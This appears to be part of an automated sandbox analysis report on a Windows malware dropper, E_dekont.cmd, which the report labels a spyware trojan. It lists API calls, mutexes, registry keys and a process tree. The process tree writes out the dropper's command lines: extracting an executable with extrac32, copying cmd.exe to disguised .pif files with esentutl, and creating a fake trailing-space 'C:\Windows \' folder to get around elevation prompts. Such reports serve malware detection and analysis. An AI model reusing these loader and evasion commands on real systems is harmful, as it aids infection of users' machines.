Source: DiagnosticsHub.StandardCollector.Service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: FXSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateComRegisterShell64.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateCore.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: GoogleUpdateOnDemand.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 117.0.5938.132_chrome_installer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msdtc.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msiexec.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: PerceptionSimulationService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: perfhost.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Locator.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: MsSense.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SensorDataService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: snmptrap.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Spectrum.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssh-agent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: TieringEngineService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe1.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AgentService.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: vds.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: VSSVC.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wbengine.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: WmiApSrv.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: wmpnetwk.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SearchIndexer.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.12.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.spyw.expl.evad.winCMD@53/167@363/23

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02AF7FD4 GetDiskFreeSpaceA,

4_2_02AF7FD4

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 12_1_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,#8,#8,#8,#15,#23,#24,#16,#411,@__unlockDebuggerData$qv,#9,#9,#9,

12_1_004019F0

Source: C:\Users\user\AppData\Local\Temp\x.exe

Code function: 4_2_02B06DC8 CoCreateInstance,

4_2_02B06DC8

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

12_1_004019F0

Source: C:\Users\Public\Libraries\wdmvmswJ.pif

Code function: 30_2_1002CBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

30_2_1002CBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\AppData\Local\Temp\x.exe

File created: C:\Users\Public\Libraries\PNO

Jump to behavior

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac5-inf
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\YfJ3kkV1qkbw4RSw
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac59ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1444:120:WilError_03
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-b2310dff430b0ac53d78ffaf-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2216:120:WilError_03

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\user\AppData\Local\Temp\CAB04912.TMP

Jump to behavior

Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	12_1_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_2_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_2_00413780
Source: C:\Users\Public\Libraries\wdmvmswJ.pif	Command line argument: 08A	30_1_00413780

Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Windows\System32\extrac32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: E_dekont.cmd	ReversingLabs: Detection: 44%
Source: E_dekont.cmd	Virustotal: Detection: 46%

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\E_dekont.cmd" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o
Source: C:\Windows\SysWOW64\esentutl.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: unknown	Process created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
Source: unknown	Process created: C:\Windows\System32\FXSSVC.exe C:\Windows\system32\fxssvc.exe
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown	Process created: C:\Windows\System32\msdtc.exe C:\Windows\System32\msdtc.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
Source: unknown	Process created: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe C:\Windows\system32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
Source: unknown	Process created: C:\Users\Public\Libraries\Jwsmvmdw.PIF "C:\Users\Public\Libraries\Jwsmvmdw.PIF"
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: unknown	Process created: C:\Windows\SysWOW64\perfhost.exe C:\Windows\SysWow64\perfhost.exe
Source: unknown	Process created: C:\Windows\System32\Locator.exe C:\Windows\system32\locator.exe
Source: unknown	Process created: C:\Windows\System32\SensorDataService.exe C:\Windows\System32\SensorDataService.exe
Source: unknown	Process created: C:\Windows\System32\snmptrap.exe C:\Windows\System32\snmptrap.exe
Source: unknown	Process created: C:\Windows\System32\Spectrum.exe C:\Windows\system32\spectrum.exe
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s SharedRealitySvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /y "C:\Users\user\Desktop\E_dekont.cmd" "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\wdmvmswJ.cmd" "	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF /o	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\esentutl.exe C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\alpha.pif C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"	Jump to behavior
Source: C:\Users\Public\alpha.pif	Process created: C:\Users\Public\xpha.pif C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif
Source: C:\Users\Public\Libraries\Jwsmvmdw.PIF	Process created: C:\Users\Public\Libraries\wdmvmswJ.pif C:\Users\Public\Libraries\wdmvmswJ.pif

Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe	Section loaded: mapi32.dll	Jump to behavior
